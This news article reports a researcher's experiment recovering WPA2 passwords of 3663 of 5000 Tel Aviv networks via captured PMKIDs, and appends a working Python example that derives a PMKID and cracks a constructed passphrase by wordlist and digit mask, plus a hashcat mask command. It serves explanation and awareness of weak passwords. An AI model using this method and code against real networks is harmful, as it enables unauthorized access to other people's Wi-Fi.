Experiment recovers the Wi-Fi passwords of 70% of Tel Aviv networks

Israeli security researcher Ido Hoorvitch has published the results of an experiment on the strength of the passwords used to protect wireless networks. By cracking passwords from captured frames carrying PMKID identifiers, he recovered the passwords of 3663 of the 5000 (73%) Tel Aviv wireless networks studied. The conclusion: most owners of wireless networks set weak passwords that can be brute-forced offline from the captured hash, and their networks can be attacked with the standard hashcat, hcxtools and hcxdumptool utilities.

Ido used a laptop running Ubuntu Linux to sniff wireless traffic: he put it in his backpack and walked around the city until he had captured frames carrying PMKID (Pairwise Master Key Identifier) values from five thousand different wireless networks. He then ran the password guessing on a machine with 8 NVIDIA QUADRO RTX 8000 48GB GPUs, using the captured PMKIDs as the hashes to crack. That server reached almost 7 million hashes per second. For comparison, an ordinary laptop manages roughly 200 thousand hashes per second, which is enough to guess a single 10-digit password in about 9 minutes when the candidate space is about 10^8 values (the 10-digit mask in the experiment was a mobile-number pattern with the fixed prefix 05, leaving eight free digits). An unconstrained 10-digit number has 10^10 candidates and takes about 14 hours at the laptop rate, or about 24 minutes on the 8-GPU server.

To speed up the cracking, the search was limited to candidates consisting of 8 lowercase letters or of 8, 9 or 10 digits. These restrictions alone were enough to recover the passwords of 3663 of the 5000 networks. The most common passwords were 10 digits long, used by 2349 networks; 8-digit passwords were used by 596 networks, 9-digit passwords by 368, and 8-lowercase-letter passwords by 320. A separate pass with the 133 MB rockyou.txt wordlist cracked 900 passwords.

The situation in other cities and countries is presumably much the same: most passwords can be guessed in a few hours, with about $50 spent on a wireless card that supports monitor mode (the experiment used an ALFA Network AWUS036ACH). The PMKID-based attack only works against access points that support roaming (PMK caching) and therefore include the PMKID in the first EAPOL message of the handshake, but in practice most manufacturers leave this enabled.

The attack uses a well-known method against WPA2 networks, described by hashcat author Jens Steube in 2018. Unlike the classic method, which requires capturing the 4-way handshake while a client connects, the PMKID-based method does not depend on a client joining the network and can be carried out at any time. A single frame carrying the PMKID is enough to start guessing the password. Such frames can be captured passively, by monitoring roaming activity, or actively: sending an authentication and association request to the access point makes it reply with the first EAPOL message, which carries the PMKID.

The PMKID is a keyed hash derived from the password, the access point's MAC address, the client's MAC address and the network name (SSID): the password and SSID are stretched into the Pairwise Master Key (PMK = PBKDF2-HMAC-SHA1(password, SSID, 4096 iterations)), and the PMKID is the first 128 bits of HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA). The last three parameters (AP MAC, station MAC and SSID) are known to the attacker from the capture, so the password can be guessed offline with a dictionary or mask, exactly as user passwords can be guessed from a leaked password hash. The security of the network therefore rests entirely on the strength of the chosen password.
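The computation above, carried through as an added example (this is illustrative code written for this page, not the researcher's tooling and not hashcat). It derives the PMK and PMKID as WPA2-Personal does, serialises them in hashcat's 22000 PMKID line format (WPA*01*PMKID*MAC_AP*MAC_STA*SSID_hex***), and then recovers the passphrase from that line by a wordlist and by a digit mask, the way the experiment did. The SSID, MAC addresses and 10-digit phone-number-shaped passphrase are constructed, not taken from a real capture.

```python
# Added example: computing a WPA2-Personal PMKID and guessing the passphrase
# offline from it. Illustrative code, not the researcher's tooling and not
# hashcat; the capture line below is constructed here, not recorded.
import hashlib
import hmac
import itertools
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) (IEEE 802.11)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def make_22000_line(passphrase: str, ssid: str, mac_ap: bytes, mac_sta: bytes) -> str:
    """Serialise what the AP leaks in EAPOL message 1 in hashcat's 22000 format:
    WPA*01*PMKID*MAC_AP*MAC_STA*SSID_hex*** (ANONCE, EAPOL and message-pair
    fields are empty for type 01, the PMKID type)."""
    tag = pmkid_from_pmk(pmk_from_passphrase(passphrase, ssid), mac_ap, mac_sta)
    return f"WPA*01*{tag.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{ssid.encode().hex()}***"


def parse_22000_line(line: str):
    """Return (pmkid, mac_ap, mac_sta, ssid) from a type-01 22000 line."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] != "01":
        raise ValueError("not a PMKID (type 01) hash line")
    return (bytes.fromhex(f[2]), bytes.fromhex(f[3]), bytes.fromhex(f[4]),
            bytes.fromhex(f[5]).decode("utf-8"))


def digit_mask(length: int, prefix: str = "") -> Iterable[str]:
    """Candidates equivalent to a hashcat ?d...?d mask, optionally with a fixed
    prefix (a fixed two-digit mobile prefix shrinks a 10-digit space from 1e10 to 1e8)."""
    for tail in itertools.product("0123456789", repeat=length - len(prefix)):
        yield prefix + "".join(tail)


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline guess: recompute the PMKID for each candidate and compare.
    Everything but the passphrase is public, so no further traffic is needed."""
    target, mac_ap, mac_sta, ssid = parse_22000_line(line)
    for cand in candidates:
        guess = pmkid_from_pmk(pmk_from_passphrase(cand, ssid), mac_ap, mac_sta)
        if hmac.compare_digest(guess, target):
            return cand
    return None


# Constructed sample network (not a real capture): SSID, AP and client MACs,
# and a 10-digit phone-number-shaped passphrase of the kind the experiment found.
SAMPLE_SSID = "HomeNet-2G"
SAMPLE_MAC_AP = bytes.fromhex("001122334455")
SAMPLE_MAC_STA = bytes.fromhex("66778899aabb")
SAMPLE_PASSPHRASE = "0541234567"
SAMPLE_LINE = make_22000_line(SAMPLE_PASSPHRASE, SAMPLE_SSID, SAMPLE_MAC_AP, SAMPLE_MAC_STA)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("wordlist:", crack_pmkid(SAMPLE_LINE, ["password", "12345678", "0541234567"]))
    # Narrow mask for a quick demo: 8 fixed digits, 2 free -> 100 candidates.
    print("mask:    ", crack_pmkid(SAMPLE_LINE, digit_mask(10, prefix="05412345")))
```

Each candidate costs a full PBKDF2 run (4096 HMAC-SHA1 iterations for each of two output blocks), which is where the per-hash cost quoted above comes from; in practice the capture is converted with hcxpcapngtool into this 22000 format and the same comparison is done by hashcat (-m 22000) with a mask such as ?d?d?d?d?d?d?d?d?d?d at GPU speed. The attack applies to WPA2-Personal only: with WPA3-SAE or WPA2-Enterprise the PMK does not come from a passphrase-derived PBKDF2, so a captured PMKID cannot be used to guess a password.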

Source: opennet.ru